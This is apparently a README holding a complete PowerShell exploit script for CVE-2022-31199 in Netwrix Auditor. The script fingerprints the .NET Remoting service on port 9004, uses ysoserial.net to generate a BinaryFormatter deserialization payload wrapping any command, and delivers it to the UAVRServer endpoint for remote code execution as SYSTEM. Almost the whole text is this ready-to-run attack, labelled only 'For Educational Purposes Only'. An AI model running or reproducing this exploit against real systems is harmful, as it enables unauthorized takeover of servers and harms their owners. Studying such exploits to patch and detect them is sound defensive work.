README.md
Rendering markdown...
<#
.SYNOPSIS
CVE-2022-31199 - Netwrix Auditor RCE Exploit
.DESCRIPTION
Exploits insecure .NET Remoting deserialization in Netwrix Auditor < 10.5
Requires ysoserial.net and ExploitRemotingService
.PARAMETER Target
Target IP address or hostname
.PARAMETER Port
Target port (default: 9004)
.PARAMETER Command
Command to execute on target
.EXAMPLE
.\exploit.ps1 -Target 192.168.1.100 -Command "whoami"
.NOTES
For Educational Purposes Only
#>
param(
[Parameter(Mandatory=$true)]
[string]$Target,
[Parameter(Mandatory=$false)]
[int]$Port = 9004,
[Parameter(Mandatory=$false)]
[string]$Command = "whoami",
[Parameter(Mandatory=$false)]
[switch]$CheckOnly
)
$Banner = @"
╔═══════════════════════════════════════════════════════╗
║ CVE-2022-31199 - Netwrix Auditor RCE Exploit ║
║ Insecure .NET Remoting Deserialization ║
║ ║
║ CVSS: 9.8 CRITICAL | CWE-502 ║
╚═══════════════════════════════════════════════════════╝
[!] For Educational Purposes Only
"@
Write-Host $Banner -ForegroundColor Cyan
# Check if required tools exist
function Test-RequiredTools {
$ysoserialPath = ".\ysoserial.exe"
$exploitPath = ".\ExploitRemotingService.exe"
if (-not (Test-Path $ysoserialPath)) {
Write-Host "[!] ysoserial.exe not found in current directory" -ForegroundColor Red
Write-Host "[!] Download from: https://github.com/pwntester/ysoserial.net" -ForegroundColor Yellow
return $false
}
if (-not (Test-Path $exploitPath)) {
Write-Host "[!] ExploitRemotingService.exe not found" -ForegroundColor Red
Write-Host "[!] Download from: https://github.com/tyranid/ExploitRemotingService" -ForegroundColor Yellow
return $false
}
return $true
}
# Check if target is vulnerable
function Test-Vulnerable {
param([string]$Target, [int]$Port)
Write-Host "`n[*] Checking if target is vulnerable..." -ForegroundColor Yellow
try {
$tcpClient = New-Object System.Net.Sockets.TcpClient
$tcpClient.Connect($Target, $Port)
Write-Host "[+] Port $Port is open" -ForegroundColor Green
# Send probe
$stream = $tcpClient.GetStream()
$probe = [byte[]](0x00,0x01,0x00,0x00,0x01,0x00,0x00,0x00)
$stream.Write($probe, 0, $probe.Length)
# Read response
$buffer = New-Object byte[] 1024
$bytesRead = $stream.Read($buffer, 0, 1024)
$response = [System.Text.Encoding]::ASCII.GetString($buffer, 0, $bytesRead)
$tcpClient.Close()
if ($response -match "\.NET|Remoting|UAVRServer|Netwrix") {
Write-Host "[+] .NET Remoting service detected!" -ForegroundColor Green
Write-Host "[+] Target appears VULNERABLE to CVE-2022-31199" -ForegroundColor Red
return $true
} else {
Write-Host "[-] .NET Remoting service not detected" -ForegroundColor Red
return $false
}
} catch {
Write-Host "[-] Error connecting to target: $_" -ForegroundColor Red
return $false
}
}
# Generate payload using ysoserial.net
function New-Payload {
param([string]$Command)
Write-Host "`n[*] Generating malicious payload..." -ForegroundColor Yellow
Write-Host "[*] Command: $Command" -ForegroundColor Cyan
# Use ysoserial.net to generate payload
$ysoArgs = "-f BinaryFormatter -o base64 -g TypeConfuseDelegate -c `"$Command`""
Write-Host "[*] Running: ysoserial.exe $ysoArgs" -ForegroundColor Gray
$payload = & .\ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c $Command
if ($LASTEXITCODE -eq 0 -and $payload) {
Write-Host "[+] Payload generated successfully" -ForegroundColor Green
return $payload
} else {
Write-Host "[-] Failed to generate payload" -ForegroundColor Red
return $null
}
}
# Exploit target using ExploitRemotingService
function Invoke-Exploit {
param(
[string]$Target,
[int]$Port,
[string]$Payload
)
Write-Host "`n[*] Exploiting target..." -ForegroundColor Yellow
# Construct URI
$uri = "tcp://${Target}:${Port}/UAVRServer"
Write-Host "[*] Target URI: $uri" -ForegroundColor Cyan
Write-Host "[*] Sending payload via ExploitRemotingService..." -ForegroundColor Yellow
# Create temp file with payload
$tempFile = [System.IO.Path]::GetTempFileName()
$Payload | Out-File -FilePath $tempFile -Encoding ASCII
# Execute ExploitRemotingService
$exploitArgs = "-s $uri raw $tempFile"
try {
$result = & .\ExploitRemotingService.exe $exploitArgs 2>&1
Write-Host "`n[*] Exploit result:" -ForegroundColor Cyan
Write-Host $result
if ($result -match "Exception|Error") {
Write-Host "`n[+] Payload executed (exception returned)" -ForegroundColor Green
Write-Host "[+] Command should have been executed with SYSTEM privileges" -ForegroundColor Green
}
} catch {
Write-Host "[-] Error executing exploit: $_" -ForegroundColor Red
} finally {
Remove-Item $tempFile -ErrorAction SilentlyContinue
}
}
# Main execution
Write-Host "`n[*] Target: $Target" -ForegroundColor Cyan
Write-Host "[*] Port: $Port" -ForegroundColor Cyan
# Check for required tools
if (-not (Test-RequiredTools)) {
exit 1
}
# Test if target is vulnerable
if (Test-Vulnerable -Target $Target -Port $Port) {
if ($CheckOnly) {
Write-Host "`n[*] Check complete. Target is vulnerable." -ForegroundColor Yellow
exit 0
}
# Generate payload
$payload = New-Payload -Command $Command
if ($payload) {
# Exploit target
Invoke-Exploit -Target $Target -Port $Port -Payload $payload
}
} else {
Write-Host "`n[-] Target does not appear vulnerable" -ForegroundColor Red
exit 1
}
Write-Host "`n[*] Exploit complete" -ForegroundColor Green